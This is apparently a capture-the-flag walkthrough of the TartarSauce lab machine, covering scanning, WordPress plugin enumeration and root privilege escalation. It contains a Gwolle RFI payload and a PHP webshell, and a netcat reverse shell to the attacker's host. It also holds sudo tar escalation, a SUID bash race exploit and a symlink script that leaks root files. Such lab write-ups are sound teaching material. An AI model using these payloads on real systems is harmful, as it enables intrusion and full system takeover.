Basic Information

Port Scan

Only port 80 is open:

$ nmap -sC -sV -Pn 10.10.10.88
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-30 13:59 CST
Nmap scan report for 10.10.10.88
Host is up (0.067s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.70 seconds

80

Nothing interesting on the homepage:

Directory Scan

robots.txt gives away /webservices (a directory scan finds it too); scanning under that directory turns up /wp:

➜  Desktop gobuster dir -u http://10.10.10.88/ -w /usr/share/seclists/Discovery/Web-Content/common.txt  -x php,html,txt -t 50

/index.html (Status: 200) [Size: 10766]
/robots.txt (Status: 200) [Size: 208]
/server-status (Status: 403) [Size: 299]
/webservices (Status: 301) [Size: 316] [--> http://10.10.10.88/webservices/]

➜ Desktop gobuster dir -u http://10.10.10.88/webservices/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt -t 50

/wp (Status: 301) [Size: 319] [--> http://10.10.10.88/webservices/wp/]

wp is a WordPress site; it doesn't render properly until you add a hosts entry:

10.10.10.88 tartarsauce.htb
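
e.g. appended to /etc/hosts on the attack box:

echo '10.10.10.88 tartarsauce.htb' | sudo tee -a /etc/hosts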

wpscan

wpscan can find the outdated plugin, but not with the default options: you have to enumerate plugins explicitly, and with the current wpscan version it only shows up in aggressive detection mode:

wpscan --url http://tartarsauce.htb/webservices/wp/
wpscan --url http://tartarsauce.htb/webservices/wp/ --enumerate p,t,u
wpscan --url http://tartarsauce.htb/webservices/wp --enumerate p --plugins-detection aggressive

Gwolle

The plugin is actually version 1.5.3, as stated in its readme:
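
One way to check it without a browser; the readme path follows the standard WordPress plugin layout:

curl -s http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt | grep -i 'stable tag'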

And searching for 1.5.3 turns up an RFI:
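
searchsploit is enough to find it:

searchsploit gwolle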

RFI webshell

Watch your HTTP server log to see which filename is requested, rename the shell to match, and you get a webshell:
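
A minimal sketch of the attacker side, based on the fact that the vulnerable include appends wp-load.php to whatever abspath points at (hence the filename, matching the abspath=...shell value used below):

echo '<?php system($_GET["cmd"]); ?>' > shellwp-load.php
python3 -m http.server 7777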

reverse shell

http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.11:7777/shell&cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.11%204444%20%3E/tmp/f

python -c 'import pty; pty.spawn("/bin/bash")'
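
The listener side is plain netcat, on the port used in the payload:

nc -lvnp 4444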

onuma

The current user www-data can run tar as onuma via sudo; tar's --checkpoint-action=exec executes an arbitrary command during archiving, which gives a shell as onuma:

to onuma

sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

user flag

user.txt is in onuma's home directory:

Privesc Enumeration

pspy or similar tools reveal that backuperer runs periodically as root:

2021/04/30 02:47:11 CMD: UID=0    PID=26084  | /bin/bash /usr/sbin/backuperer

[+] Searching Wordpress wp-config.php files
wp-config.php files found:
/var/www/html/webservices/wp/wp-config.php
define('DB_NAME', 'wp');
define('DB_USER', 'wpuser');
define('DB_PASSWORD', 'w0rdpr3$$d@t@b@$3@cc3$$');
define('DB_HOST', 'localhost');
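
For reference, a typical way to get pspy onto the box; the 32-bit build, since the target is 32-bit, and the host/port are whatever your setup uses:

# attacker
python3 -m http.server 8000
# target
cd /tmp && wget http://10.10.14.11:8000/pspy32 && chmod +x pspy32 && ./pspy32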

Reading the script, the flow is roughly as follows:

# Backup onuma website dev files.
# back up /var/www/html into /var/tmp; -z means gzip compression
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# sleep for 30 seconds
/bin/sleep 30

# create the /var/tmp/check directory
/bin/mkdir $check

# extract the backup into the check directory
/bin/tar -zxvf $tmpfile -C $check

# run integrity_chk; if the check passes, move the backup to /var/backups/onuma-www-dev.bak and delete the temp file; if it fails, write an error msg
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}

Race Condition

The idea is to exploit the 30-second sleep: while the script sleeps, extract the archive, replace one of its files with a symlink, and re-pack it. When the script then extracts the doctored archive and diffs it against the live tree, the files differ, and the error message, including the contents of both files, is written to onuma_backup_error.txt (see exp.sh below).

Alternatively, go straight for a SUID file: during the 30-second sleep, swap in an archive containing a SUID binary and let the script, running as root, extract it into check. Since GNU tar run as root preserves ownership and setuid bits by default, the extracted binary stays SUID root.

/usr/sbin/backuperer

#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
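
The script is driven by a systemd timer rather than cron, so you can check from the target how often it fires (about every five minutes on this box), which is also how long you have between attempts:

systemctl list-timers
systemctl cat backuperer.timer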

Privesc & root flag

cp /bin/bash .
sudo chown root bash
sudo chmod +xs bash
mkdir -p var/www/html
mv bash var/www/html
tar -zcvf shell.tar.gz var/

# overwrite the temp archive under /var/tmp as soon as it appears
cp /tmp/shell.tar.gz .ce9d5a30bafb9c15cbf4a5b8d77c2b17f3cd1148

# wait for it to be extracted into check, then go in and run the SUID binary
# it has to be a 32-bit bash; I copied the 64-bit one, it errored out, and I didn't feel like redoing it
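
Once the root-run tar has extracted the archive into the check directory, run the SUID copy with -p so bash keeps its effective UID (the path follows from the script's $check variable):

/var/tmp/check/var/www/html/bash -p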

Symlink to get root flag

Create a symlink so the error report leaks the file:

exp.sh

#!/bin/bash

# work out of shm
cd /dev/shm

# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")

# loop until there's a change in cur
echo "Waiting for archive filename to change..."
while [ "$start" == "$cur" -o "$cur" == "" ] ; do
sleep 10;
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done

# Grab a copy of the archive
echo "File changed... copying here"
cp $cur .

# get filename
fn=$(echo $cur | cut -d'/' -f4)

# extract archive
tar -zxf $fn

# remove robots.txt and replace it with link to root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt

# remove old archive
rm $fn

# create new archive
tar czf $fn var

# put it back, and clean up
mv $fn $cur
rm -rf var

# wait for results
echo "Waiting for new logs..."
tail -f /var/backups/onuma_backup_error.txt
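
Drop the script on the target, make it executable, and run it as onuma (it works out of /dev/shm on its own):

chmod +x exp.sh
./exp.sh

On the next backup cycle, the diff between the real robots.txt and the symlinked /root/root.txt lands in onuma_backup_error.txt, flag included.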
